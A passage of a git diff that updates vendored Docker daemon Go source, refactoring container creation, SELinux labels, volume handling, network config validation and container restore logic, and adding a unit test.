toHostConfigSelinuxLabels(label.DisableSecOpt()), nil } var ipcLabel []string @@ -174,7 +227,7 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod } ipcLabel = label.DupSecOpt(c.ProcessLabel) if pidContainer == "" { - return ipcLabel, err + return toHostConfigSelinuxLabels(ipcLabel), err } } if pidContainer != "" { @@ -185,7 +238,7 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod pidLabel = label.DupSecOpt(c.ProcessLabel) if ipcContainer == "" { - return pidLabel, err + return toHostConfigSelinuxLabels(pidLabel), err } } @@ -195,52 +248,11 @@ func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMod return nil, fmt.Errorf("--ipc and --pid containers SELinux labels aren't the same") } } - return pidLabel, nil + return toHostConfigSelinuxLabels(pidLabel), nil } return nil, nil } -func (daemon *Daemon) setRWLayer(container *container.Container) error { - var layerID layer.ChainID - if container.ImageID != "" { - img, err := daemon.imageStore.Get(container.ImageID) - if err != nil { - return err - } - layerID = img.RootFS.ChainID() - } - - rwLayer, err := daemon.layerStore.CreateRWLayer(container.ID, layerID, container.MountLabel, daemon.getLayerInit(), container.HostConfig.StorageOpt) - - if err != nil { - return err - } - container.RWLayer = rwLayer - - return nil -} - -// VolumeCreate creates a volume with the specified name, driver, and opts -// This is called directly from the Engine API -func (daemon *Daemon) VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) { - if name == "" { - name = stringid.GenerateNonCryptoID() - } - - v, err := daemon.volumes.Create(name, driverName, opts, labels) - if err != nil { - if volumestore.IsNameConflict(err) { - return nil, fmt.Errorf("A volume named %s already exists. Choose a different volume name.", name) - } - return nil, err - } - - daemon.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()}) - apiV := volumeToAPIType(v) - apiV.Mountpoint = v.Path() - return apiV, nil -} - func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *image.Image) error { if img != nil && img.Config != nil { if err := merge(config, img.Config); err != nil { @@ -259,22 +271,25 @@ func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *i // Checks if the client set configurations for more than one network while creating a container // Also checks if the IPAMConfig is valid -func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error { +func verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error { if nwConfig == nil || len(nwConfig.EndpointsConfig) == 0 { return nil } if len(nwConfig.EndpointsConfig) == 1 { - for _, v := range nwConfig.EndpointsConfig { - if v != nil && v.IPAMConfig != nil { + for k, v := range nwConfig.EndpointsConfig { + if v == nil { + return errdefs.InvalidParameter(errors.Errorf("no EndpointSettings for %s", k)) + } + if v.IPAMConfig != nil { if v.IPAMConfig.IPv4Address != "" && net.ParseIP(v.IPAMConfig.IPv4Address).To4() == nil { - return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address)) + return errors.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address) } if v.IPAMConfig.IPv6Address != "" { n := net.ParseIP(v.IPAMConfig.IPv6Address) // if the address is an invalid network address (ParseIP == nil) or if it is // an IPv4 address (To4() != nil), then it is an invalid IPv6 address if n == nil || n.To4() != nil { - return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address)) + return errors.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address) } } } @@ -285,6 +300,5 @@ func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingCo for k := range nwConfig.EndpointsConfig { l = append(l, k) } - err := fmt.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", ")) - return apierrors.NewBadRequestError(err) + return errors.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", ")) } diff --git a/vendor/github.com/docker/docker/daemon/create_test.go b/vendor/github.com/docker/docker/daemon/create_test.go new file mode 100644 index 0000000000..3dba847d46 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create_test.go @@ -0,0 +1,21 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "testing" + + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/errdefs" + "gotest.tools/assert" +) + +// Test case for 35752 +func TestVerifyNetworkingConfig(t *testing.T) { + name := "mynet" + endpoints := make(map[string]*network.EndpointSettings, 1) + endpoints[name] = nil + nwConfig := &network.NetworkingConfig{ + EndpointsConfig: endpoints, + } + err := verifyNetworkingConfig(nwConfig) + assert.Check(t, errdefs.IsInvalidParameter(err)) +} diff --git a/vendor/github.com/docker/docker/daemon/create_unix.go b/vendor/github.com/docker/docker/daemon/create_unix.go index 2fe5c98a79..eb9b653730 100644 --- a/vendor/github.com/docker/docker/daemon/create_unix.go +++ b/vendor/github.com/docker/docker/daemon/create_unix.go @@ -1,32 +1,45 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "os" "path/filepath" - "github.com/Sirupsen/logrus" containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" + "github.com/docker/docker/oci" "github.com/docker/docker/pkg/stringid" - "github.com/opencontainers/runc/libcontainer/label" + volumeopts "github.com/docker/docker/volume/service/opts" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" ) -// createContainerPlatformSpecificSettings performs platform specific container create functionality -func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { +// createContainerOSSpecificSettings performs host-OS specific container create functionality +func (daemon *Daemon) createContainerOSSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { if err := daemon.Mount(container); err != nil { return err } defer daemon.Unmount(container) - rootUID, rootGID := daemon.GetRemappedUIDGID() - if err := container.SetupWorkingDirectory(rootUID, rootGID); err != nil { + rootIDs := daemon.idMappings.RootPair() + if err := container.SetupWorkingDirectory(rootIDs); err != nil { return err } + // Set the default masked and readonly paths with regard to the host config options if they are not set. + if hostConfig.MaskedPaths == nil && !hostConfig.Privileged { + hostConfig.MaskedPaths = oci.DefaultSpec().Linux.MaskedPaths // Set it to the default if nil + container.HostConfig.MaskedPaths = hostConfig.MaskedPaths + } + if hostConfig.ReadonlyPaths == nil && !hostConfig.Privileged { + hostConfig.ReadonlyPaths = oci.DefaultSpec().Linux.ReadonlyPaths // Set it to the default if nil + container.HostConfig.ReadonlyPaths = hostConfig.ReadonlyPaths + } + for spec := range config.Volumes { name := stringid.GenerateNonCryptoID() destination := filepath.Clean(spec) @@ -46,16 +59,16 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain return fmt.Errorf("cannot mount volume over existing file, file exists %s", path) } - v, err := daemon.volumes.CreateWithRef(name, hostConfig.VolumeDriver, container.ID, nil, nil) + v, err := daemon.volumes.Create(context.TODO(), name, hostConfig.VolumeDriver, volumeopts.WithCreateReference(container.ID)) if err != nil { return err } - if err := label.Relabel(v.Path(), container.MountLabel, true); err != nil { + if err := label.Relabel(v.Mountpoint, container.MountLabel, true); err != nil { return err } - container.AddMountPointWithVolume(destination, v, true) + container.AddMountPointWithVolume(destination, &volumeWrapper{v: v, s: daemon.volumes}, true) } return daemon.populateVolumes(container) } diff --git a/vendor/github.com/docker/docker/daemon/create_windows.go b/vendor/github.com/docker/docker/daemon/create_windows.go index bbf0dbe7b9..37e425a014 100644 --- a/vendor/github.com/docker/docker/daemon/create_windows.go +++ b/vendor/github.com/docker/docker/daemon/create_windows.go @@ -1,24 +1,37 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" + "runtime" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/volume" + volumemounts "github.com/docker/docker/volume/mounts" + volumeopts "github.com/docker/docker/volume/service/opts" ) -// createContainerPlatformSpecificSettings performs platform specific container create functionality -func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { - // Make sure the host config has the default daemon isolation if not specified by caller. - if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) { - hostConfig.Isolation = daemon.defaultIsolation - } +// createContainerOSSpecificSettings performs host-OS specific container create functionality +func (daemon *Daemon) createContainerOSSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { + if container.OS == runtime.GOOS { + // Make sure the host config has the default daemon isolation if not specified by caller. + if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) { + hostConfig.Isolation = daemon.defaultIsolation + } + } else { + // LCOW must be a Hyper-V container as you can't run a shared kernel when one + // is a Windows kernel, the other is a Linux kernel. + if containertypes.Isolation.IsProcess(containertypes.Isolation(hostConfig.Isolation)) { + return fmt.Errorf("process isolation is invalid for Linux containers on Windows") + } + hostConfig.Isolation = "hyperv" + } + parser := volumemounts.NewParser(container.OS) for spec := range config.Volumes { - mp, err := volume.ParseMountRaw(spec, hostConfig.VolumeDriver) + mp, err := parser.ParseMountRaw(spec, hostConfig.VolumeDriver) if err != nil { return fmt.Errorf("Unrecognised volume spec: %v", err) } @@ -38,7 +51,7 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain // Create the volume in the volume driver. If it doesn't exist, // a new one will be created. - v, err := daemon.volumes.CreateWithRef(mp.Name, volumeDriver, container.ID, nil, nil) + v, err := daemon.volumes.Create(context.TODO(), mp.Name, volumeDriver, volumeopts.WithCreateReference(container.ID)) if err != nil { return err } @@ -74,7 +87,7 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain // } // Add it to container.MountPoints - container.AddMountPointWithVolume(mp.Destination, v, mp.RW) + container.AddMountPointWithVolume(mp.Destination, &volumeWrapper{v: v, s: daemon.volumes}, mp.RW) } return nil } diff --git a/vendor/github.com/docker/docker/daemon/daemon.go b/vendor/github.com/docker/docker/daemon/daemon.go index 55a66aec92..5e5f586ae0 100644 --- a/vendor/github.com/docker/docker/daemon/daemon.go +++ b/vendor/github.com/docker/docker/daemon/daemon.go @@ -3,10 +3,10 @@ // // In implementing the various functions of the daemon, there is often // a method-specific struct for configuring the runtime behavior. -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "encoding/json" + "context" "fmt" "io/ioutil" "net" @@ -18,111 +18,120 @@ import ( "sync" "time" - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/api" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/builder" "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/discovery" "github.com/docker/docker/daemon/events" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/daemon/initlayer" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/plugin" - "github.com/docker/libnetwork/cluster" + "github.com/docker/docker/daemon/images" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/sirupsen/logrus" // register graph drivers _ "github.com/docker/docker/daemon/graphdriver/register" + "github.com/docker/docker/daemon/stats" dmetadata "github.com/docker/docker/distribution/metadata" - "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/dockerversion" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/libcontainerd" "github.com/docker/docker/migrate/v1" - "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/plugingetter" - "github.com/docker/docker/pkg/registrar" - "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/sysinfo" "github.com/docker/docker/pkg/system" "github.com/docker/docker/pkg/truncindex" - "github.com/docker/docker/reference" + "github.com/docker/docker/plugin" + pluginexec "github.com/docker/docker/plugin/executor/containerd" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" "github.com/docker/docker/runconfig" - volumedrivers "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/docker/docker/volume/store" + volumesservice "github.com/docker/docker/volume/service" "github.com/docker/libnetwork" + "github.com/docker/libnetwork/cluster" nwconfig "github.com/docker/libnetwork/config" - "github.com/docker/libtrust" "github.com/pkg/errors" ) -var ( - // DefaultRuntimeBinary is the default runtime to be used by - // containerd if none is specified - DefaultRuntimeBinary = "docker-runc" - - // DefaultInitBinary is the name of the default init binary - DefaultInitBinary = "docker-init" +// ContainersNamespace is the name of the namespace used for users containers +const ContainersNamespace = "moby" - errSystemNotSupported = fmt.Errorf("The Docker daemon is not supported on this platform.") +var ( + errSystemNotSupported = errors.New("the Docker daemon is not supported on this platform") ) // Daemon holds information about the Docker daemon. type Daemon struct { - ID string - repository string - containers container.Store - execCommands *exec.Store - referenceStore reference.Store - downloadManager *xfer.LayerDownloadManager - uploadManager *xfer.LayerUploadManager - distributionMetadataStore dmetadata.Store - trustKey libtrust.PrivateKey - idIndex *truncindex.TruncIndex - configStore *Config - statsCollector *statsCollector - defaultLogConfig containertypes.LogConfig - RegistryService registry.Service - EventsService *events.Events - netController libnetwork.NetworkController - volumes *store.VolumeStore - discoveryWatcher discoveryReloader - root string - seccompEnabled bool - shutdown bool - uidMaps []idtools.IDMap - gidMaps []idtools.IDMap - layerStore layer.Store - imageStore image.Store - PluginStore *plugin.Store // todo: remove - pluginManager *plugin.Manager - nameIndex *registrar.Registrar - linkIndex *linkIndex - containerd libcontainerd.Client - containerdRemote libcontainerd.Remote - defaultIsolation containertypes.Isolation // Default isolation mode on Windows - clusterProvider cluster.Provider - cluster Cluster + ID string + repository string + containers container.Store + containersReplica container.ViewDB + execCommands *exec.Store + imageService *images.ImageService + idIndex *truncindex.TruncIndex + configStore *config.Config + statsCollector *stats.Collector + defaultLogConfig containertypes.LogConfig + RegistryService registry.Service + EventsService *events.Events + netController libnetwork.NetworkController + volumes *volumesservice.VolumesService + discoveryWatcher discovery.Reloader + root string + seccompEnabled bool + apparmorEnabled bool + shutdown bool + idMappings *idtools.IDMappings + // TODO: move graphDrivers field to an InfoService + graphDrivers map[string]string // By operating system + + PluginStore *plugin.Store // todo: remove + pluginManager *plugin.Manager + linkIndex *linkIndex + containerd libcontainerd.Client + defaultIsolation containertypes.Isolation // Default isolation mode on Windows + clusterProvider cluster.Provider + cluster Cluster + genericResources []swarm.GenericResource + metricsPluginListener net.Listener + + machineMemory uint64 seccompProfile []byte seccompProfilePath string + + diskUsageRunning int32 + pruneRunning int32 + hosts map[string]bool // hosts stores the addresses the daemon is listening on + startupDone chan struct{} + + attachmentStore network.AttachmentStore + attachableNetworkLock *locker.Locker +} + +// StoreHosts stores the addresses the daemon is listening on +func (daemon *Daemon) StoreHosts(hosts []string) { + if daemon.hosts == nil { + daemon.hosts = make(map[string]bool) + } + for _, h := range hosts { + daemon.hosts[h] = true + } } // HasExperimental returns whether the experimental features of the daemon are enabled or not func (daemon *Daemon) HasExperimental() bool { - if daemon.configStore != nil && daemon.configStore.Experimental { - return true - } - return false + return daemon.configStore != nil && daemon.configStore.Experimental } func (daemon *Daemon) restore() error { - var ( - currentDriver = daemon.GraphDriverName() - containers = make(map[string]*container.Container) - ) + containers := make(map[string]*container.Container) logrus.Info("Loading containers: start.") @@ -138,16 +147,20 @@ func (daemon *Daemon) restore() error { logrus.Errorf("Failed to load container %v: %v", id, err) continue } - + if !system.IsOSSupported(container.OS) { + logrus.Errorf("Failed to load container %v: %s (%q)", id, system.ErrNotSupportedOperatingSystem, container.OS) + continue + } // Ignore the container if it does not support the current driver being used by the graph - if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver { - rwlayer, err := daemon.layerStore.GetRWLayer(container.ID) + currentDriverForContainerOS := daemon.graphDrivers[container.OS] + if (container.Driver == "" && currentDriverForContainerOS == "aufs") || container.Driver == currentDriverForContainerOS { + rwlayer, err := daemon.imageService.GetLayerByID(container.ID, container.OS) if err != nil { logrus.Errorf("Failed to load container mount %v: %v", id, err) continue } container.RWLayer = rwlayer - logrus.Debugf("Loaded container %v", container.ID) + logrus.Debugf("Loaded container %v, isRunning: %v", container.ID, container.IsRunning()) containers[container.ID] = container } else { @@ -160,7 +173,7 @@ func (daemon *Daemon) restore() error { activeSandboxes := make(map[string]interface{}) for id, c := range containers { if err := daemon.registerName(c); err != nil { - logrus.Errorf("Failed to register container %s: %s", c.ID, err) + logrus.Errorf("Failed to register container name %s: %s", c.ID, err) delete(containers, id) continue } @@ -170,12 +183,6 @@ func (daemon *Daemon) restore() error { continue } - // verify that all volumes valid and have been migrated from the pre-1.7 layout - if err := daemon.verifyVolumesInfo(c); err != nil { - // don't skip the container due to error - logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err) - } - // The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver. // We should rewrite it to use the daemon defaults. // Fixes https://github.com/docker/docker/issues/22536 @@ -187,22 +194,93 @@ func (daemon *Daemon) restore() error { } } - var migrateLegacyLinks bool // Not relevant on Windows - var wg sync.WaitGroup - var mapLock sync.Mutex + var ( + wg sync.WaitGroup + mapLock sync.Mutex + ) for _, c := range containers { wg.Add(1) go func(c *container.Container) { defer wg.Done() - if err := backportMountSpec(c); err != nil { - logrus.Error("Failed to migrate old mounts to use new spec format") + daemon.backportMountSpec(c) + if err := daemon.checkpointAndSave(c); err != nil { + logrus.WithError(err).WithField("container", c.ID).Error("error saving backported mountspec to disk") + } + + daemon.setStateCounter(c) + + logrus.WithFields(logrus.Fields{ + "container": c.ID, + "running": c.IsRunning(), + "paused": c.IsPaused(), + }).Debug("restoring container") + + var ( + err error + alive bool + ec uint32 + exitedAt time.Time + ) + + alive, _, err = daemon.containerd.Restore(context.Background(), c.ID, c.InitializeStdio) + if err != nil && !errdefs.IsNotFound(err) { + logrus.Errorf("Failed to restore container %s with containerd: %s", c.ID, err) + return + } + if !alive { + ec, exitedAt, err = daemon.containerd.DeleteTask(context.Background(), c.ID) + if err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).Errorf("Failed to delete container %s from containerd", c.ID) + return + } + } else if !daemon.configStore.LiveRestoreEnabled { + if err := daemon.kill(c, c.StopSignal()); err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).WithField("container", c.ID).Error("error shutting down container") + return + } } if c.IsRunning() || c.IsPaused() { c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking - if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil { - logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err) - return + + if c.IsPaused() && alive { + s, err := daemon.containerd.Status(context.Background(), c.ID) + if err != nil { + logrus.WithError(err).WithField("container", c.ID). + Errorf("Failed to get container status") + } else { + logrus.WithField("container", c.ID).WithField("state", s). + Info("restored container paused") + switch s { + case libcontainerd.StatusPaused, libcontainerd.StatusPausing: + // nothing to do + case libcontainerd.StatusStopped: + alive = false + case libcontainerd.StatusUnknown: + logrus.WithField("container", c.ID). + Error("Unknown status for container during restore") + default: + // running + c.Lock() + c.Paused = false + daemon.setStateCounter(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).WithField("container", c.ID). + Error("Failed to update stopped container state") + } + c.Unlock() + } + } + } + + if !alive { + c.Lock() + c.SetStopped(&container.ExitStatus{ExitCode: int(ec), ExitedAt: exitedAt}) + daemon.Cleanup(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + logrus.Errorf("Failed to update stopped container %s state: %v", c.ID, err) + } + c.Unlock() } // we call Mount and then Unmount to get BaseFs of the container @@ -215,7 +293,6 @@ func (daemon *Daemon) restore() error { // The error is only logged here. logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err) } else { - // if mount success, then unmount it if err := daemon.Unmount(c); err != nil { logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err) } @@ -231,28 +308,27 @@ func (daemon *Daemon) restore() error { activeSandboxes[c.NetworkSettings.SandboxID] = options mapLock.Unlock() } - } - // fixme: only if not running + // get list of containers we need to restart - if !c.IsRunning() && !c.IsPaused() { - // Do not autostart containers which - // has endpoints in a swarm scope - // network yet since the cluster is - // not initialized yet. We will start - // it after the cluster is - // initialized. - if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint { - mapLock.Lock() - restartContainers[c] = make(chan struct{}) - mapLock.Unlock() - } else if c.HostConfig != nil && c.HostConfig.AutoRemove { - mapLock.Lock() - removeContainers[c.ID] = c - mapLock.Unlock() - } + + // Do not autostart containers which + // has endpoints in a swarm scope + // network yet since the cluster is + // not initialized yet. We will start + // it after the cluster is + // initialized. + if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint && c.HasBeenStartedBefore { + mapLock.Lock() + restartContainers[c] = make(chan struct{}) + mapLock.Unlock() + } else if c.HostConfig != nil && c.HostConfig.AutoRemove { + mapLock.Lock() + removeContainers[c.ID] = c + mapLock.Unlock() } + c.Lock() if c.RemovalInProgress { // We probably crashed in the middle of a removal, reset // the flag. @@ -263,15 +339,13 @@ func (daemon *Daemon) restore() error { // be removed. So we put the container in the "dead" // state and leave further processing up to them. logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID) - c.ResetRemovalInProgress() - c.SetDead() - c.ToDisk() - } - - // if c.hostConfig.Links is nil (not just empty), then it is using the old sqlite links and needs to be migrated - if c.HostConfig != nil && c.HostConfig.Links == nil { - migrateLegacyLinks = true + c.RemovalInProgress = false + c.Dead = true + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + logrus.Errorf("Failed to update RemovalInProgress container %s state: %v", c.ID, err) + } } + c.Unlock() }(c) } wg.Wait() @@ -280,13 +354,6 @@ func (daemon *Daemon) restore() error { return fmt.Errorf("Error initializing network controller: %v", err) } - // Perform migration of legacy sqlite links (no-op on Windows) - if migrateLegacyLinks { - if err := daemon.sqliteMigration(containers); err != nil { - return err - } - } - // Now that all the containers are registered, register the links for _, c := range containers { if err := daemon.registerLinks(c, c.HostConfig); err != nil { @@ -348,7 +415,7 @@ func (daemon *Daemon) restore() error { // if the container has restart policy, do not // prepare the mountpoints since it has been done on restarting. // This is to speed up the daemon start when a restart container - // has a volume and the volume dirver is not available. + // has a volume and the volume driver is not available. if _, ok := restartContainers[c]; ok { continue } else if _, ok := removeContainers[c.ID]; ok { @@ -381,7 +448,7 @@ func (daemon *Daemon) RestartSwarmContainers() { // Autostart all the containers which has a // swarm endpoint now that the cluster is // initialized. - if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint { + if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint && c.HasBeenStartedBefore { group.Add(1) go func(c *container.Container) { defer group.Done() @@ -435,8 +502,8 @@ func (daemon *Daemon) parents(c *container.Container) map[string]*container.Cont func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error { fullName := path.Join(parent.Name, alias) - if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil { - if err == registrar.ErrNameReserved { + if err := daemon.containersReplica.ReserveName(fullName, child.ID); err != nil { + if err == container.ErrNameReserved { logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err) return nil } @@ -457,15 +524,34 @@ func (daemon *Daemon) DaemonLeavesCluster() { // Daemon is in charge of removing the attachable networks with // connected containers when the node leaves the swarm daemon.clearAttachableNetworks() + // We no longer need the cluster provider, stop it now so that + // the network agent will stop listening to cluster events. daemon.setClusterProvider(nil) + // Wait for the networking cluster agent to stop + daemon.netController.AgentStopWait() + // Daemon is in charge of removing the ingress network when the + // node leaves the swarm. Wait for job to be done or timeout. + // This is called also on graceful daemon shutdown. We need to + // wait, because the ingress release has to happen before the + // network controller is stopped. + if done, err := daemon.ReleaseIngress(); err == nil { + select { + case <-done: + case <-time.After(5 * time.Second): + logrus.Warnf("timeout while waiting for ingress network removal") + } + } else { + logrus.Warnf("failed to initiate ingress network removal: %v", err) + } + + daemon.attachmentStore.ClearAttachments() } // setClusterProvider sets a component for querying the current cluster state. func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) { daemon.clusterProvider = clusterProvider - // call this in a goroutine to allow netcontroller handle this event async - // and not block if it is in the middle of talking with cluster - go daemon.netController.SetClusterProvider(clusterProvider) + daemon.netController.SetClusterProvider(clusterProvider) + daemon.attachableNetworkLock = locker.New() } // IsSwarmCompatible verifies if the current daemon @@ -474,12 +560,12 @@ func (daemon *Daemon) IsSwarmCompatible() error { if daemon.configStore == nil { return nil } - return daemon.configStore.isSwarmCompatible() + return daemon.configStore.IsSwarmCompatible() } // NewDaemon sets up everything for the daemon to be able to service // requests from the webserver. -func NewDaemon(config *Config, registryService registry.Service, containerdRemote libcontainerd.Remote) (daemon *Daemon, err error) { +func NewDaemon(config *config.Config, registryService registry.Service, containerdRemote libcontainerd.Remote, pluginStore *plugin.Store) (daemon *Daemon, err error) { setDefaultMtu(config) // Ensure that we have a correct root key limit for launching containers. @@ -505,31 +591,41 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot return nil, err } - uidMaps, gidMaps, err := setupRemappedRoot(config) - if err != nil { - return nil, err - } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + idMappings, err := setupRemappedRoot(config) if err != nil { return nil, err } - + rootIDs := idMappings.RootPair() if err := setupDaemonProcess(config); err != nil { return nil, err } // set up the tmpDir to use a canonical path - tmp, err := tempDir(config.Root, rootUID, rootGID) + tmp, err := prepareTempDir(config.Root, rootIDs) if err != nil { return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err) } - realTmp, err := fileutils.ReadSymlinkedDirectory(tmp) + realTmp, err := getRealPath(tmp) if err != nil { return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err) } - os.Setenv("TMPDIR", realTmp) + if runtime.GOOS == "windows" { + if _, err := os.Stat(realTmp); err != nil && os.IsNotExist(err) { + if err := system.MkdirAll(realTmp, 0700, ""); err != nil { + return nil, fmt.Errorf("Unable to create the TempDir (%s): %s", realTmp, err) + } + } + os.Setenv("TEMP", realTmp) + os.Setenv("TMP", realTmp) + } else { + os.Setenv("TMPDIR", realTmp) + } - d := &Daemon{configStore: config} + d := &Daemon{ + configStore: config, + PluginStore: pluginStore, + startupDone: make(chan struct{}), + } // Ensure the daemon is properly shutdown if there is a failure during // initialization defer func() { @@ -540,6 +636,17 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot } }() + if err := d.setGenericResources(config); err != nil { + return nil, err + } + // set up SIGUSR1 handler on Unix-like systems, or a Win32 global event + // on Windows to dump Go routine stacks + stackDumpDir := config.Root + if execRoot := config.GetExecRoot(); execRoot != "" { + stackDumpDir = execRoot + } + d.setupDumpStackTrap(stackDumpDir) + if err := d.setupSeccompProfile(); err != nil { return nil, err } @@ -549,8 +656,6 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot return nil, fmt.Errorf("error setting default isolation mode: %v", err) } - logrus.Debugf("Using default logging driver %s", config.LogConfig.Type) - if err := configureMaxThreads(config); err != nil { logrus.Warnf("Failed to configure golang's threads limit: %v", err) } @@ -560,111 +665,171 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot } daemonRepo := filepath.Join(config.Root, "containers") - if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(daemonRepo, 0700, rootIDs); err != nil { + return nil, err + } + + // Create the directory where we'll store the runtime scripts (i.e. in + // order to support runtimeArgs) + daemonRuntimes := filepath.Join(config.Root, "runtimes") + if err := system.MkdirAll(daemonRuntimes, 0700, ""); err != nil { + return nil, err + } + if err := d.loadRuntimes(); err != nil { return nil, err } if runtime.GOOS == "windows" { - if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) { + if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0, ""); err != nil { return nil, err } } - driverName := os.Getenv("DOCKER_DRIVER") - if driverName == "" { - driverName = config.GraphDriver + // On Windows we don't support the environment variable, or a user supplied graphdriver + // as Windows has no choice in terms of which graphdrivers to use. It's a case of + // running Windows containers on Windows - windowsfilter, running Linux containers on Windows, + // lcow. Unix platforms however run a single graphdriver for all containers, and it can + // be set through an environment variable, a daemon start parameter, or chosen through + // initialization of the layerstore through driver priority order for example. + d.graphDrivers = make(map[string]string) + layerStores := make(map[string]layer.Store) + if runtime.GOOS == "windows" { + d.graphDrivers[runtime.GOOS] = "windowsfilter" + if system.LCOWSupported() { + d.graphDrivers["linux"] = "lcow" + } + } else { + driverName := os.Getenv("DOCKER_DRIVER") + if driverName == "" { + driverName = config.GraphDriver + } else { + logrus.Infof("Setting the storage driver from the $DOCKER_DRIVER environment variable (%s)", driverName) + } + d.graphDrivers[runtime.GOOS] = driverName // May still be empty. Layerstore init determines instead. } d.RegistryService = registryService - d.PluginStore = plugin.NewStore(config.Root) // todo: remove + logger.RegisterPluginGetter(d.PluginStore) + + metricsSockPath, err := d.listenMetricsSock() + if err != nil { + return nil, err + } + registerMetricsPluginCallback(d.PluginStore, metricsSockPath) + + createPluginExec := func(m *plugin.Manager) (plugin.Executor, error) { + return pluginexec.New(getPluginExecRoot(config.Root), containerdRemote, m) + } + // Plugin system initialization should happen before restore. Do not change order. d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{ Root: filepath.Join(config.Root, "plugins"), - ExecRoot: 